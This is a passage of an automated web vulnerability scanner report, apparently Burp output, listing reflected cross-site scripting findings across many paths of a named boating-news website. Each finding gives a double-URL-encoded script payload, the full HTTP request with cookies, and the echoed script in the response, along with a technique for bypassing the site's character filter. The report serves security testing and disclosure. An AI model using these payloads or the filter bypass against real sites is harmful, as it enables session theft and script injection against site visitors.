<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<a href="/component/yvcomment/?6b994"><script>alert(1)</script>013ba99ca1c=1&start=20" title="2">
...[SNIP]...

4.886. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/contact-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30bf4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3f33f21489 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30bf4"><script>alert(1)</script>c3f33f21489 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /contact-us?30bf4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3f33f21489=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

4.887. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f351c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4d6af0ba0d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f351c"><script>alert(1)</script>4d6af0ba0d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /features?f351c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4d6af0ba0d9=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features?f351c"><script>alert(1)</script>4d6af0ba0d9=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.888. http://www.soundingsonline.com/features/destinations [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/destinations

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c7d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e099334d02e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51c7d"><script>alert(1)</script>099334d02e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /features/destinations?51c7d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e099334d02e6=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

4.889. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/in-depth

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73579%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57ef455a60d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73579"><script>alert(1)</script>57ef455a60d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /features/in-depth?73579%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57ef455a60d=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/in-depth?73579"><script>alert(1)</script>57ef455a60d=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.890. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/justyesterday

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dd2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67be2bf67f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1dd2b"><script>alert(1)</script>67be2bf67f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /features/justyesterday?1dd2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67be2bf67f4=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/justyesterday?1dd2b"><script>alert(1)</script>67be2bf67f4=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.891. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/lifestyle

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fd13%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f2d84a438 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3fd13"><script>alert(1)</script>73f2d84a438 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /features/lifestyle?3fd13%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f2d84a438=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/lifestyle?3fd13"><script>alert(1)</script>73f2d84a438=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.892. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/profiles

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d4ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efe6bf0d5746 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d4ab"><script>alert(1)</script>fe6bf0d5746 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /features/profiles?9d4ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efe6bf0d5746=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/profiles?9d4ab"><script>alert(1)</script>fe6bf0d5746=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.893. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/technical

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdb26%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67cb149e626 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cdb26"><script>alert(1)</script>67cb149e626 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /features/technical?cdb26%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67cb149e626=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/technical?cdb26"><script>alert(1)</script>67cb149e626=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.894. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/type-of-boat

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b840b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e20e32f818ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b840b"><script>alert(1)</script>20e32f818ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /features/type-of-boat?b840b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e20e32f818ce=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/type-of-boat?b840b"><script>alert(1)</script>20e32f818ce=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.895. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4c7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbe605dcccb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4c7f"><script>alert(1)</script>cbe605dcccb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111&a4c7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbe605dcccb=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/buy-a-boat?a4c7f"><script>alert(1)</script>cbe605dcccb=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.896. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/digital-publications

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed44198a6732 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cbb5b"><script>alert(1)</script>d44198a6732 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /more/digital-publications?cbb5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed44198a6732=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/more/digital-publications?cbb5b"><script>alert(1)</script>d44198a6732=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.897. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/the-masters-series

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2be4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52ad10d94f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2be4f"><script>alert(1)</script>52ad10d94f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /more/the-masters-series?2be4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52ad10d94f9=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/more/the-masters-series?2be4f"><script>alert(1)</script>52ad10d94f9=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.898. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e720e96da4e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47b74"><script>alert(1)</script>720e96da4e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /news?47b74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e720e96da4e2=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news?47b74"><script>alert(1)</script>720e96da4e2=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.899. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/coastwise

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51b8e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5c8ce41216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51b8e"><script>alert(1)</script>c5c8ce41216 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /news/coastwise?51b8e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5c8ce41216=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
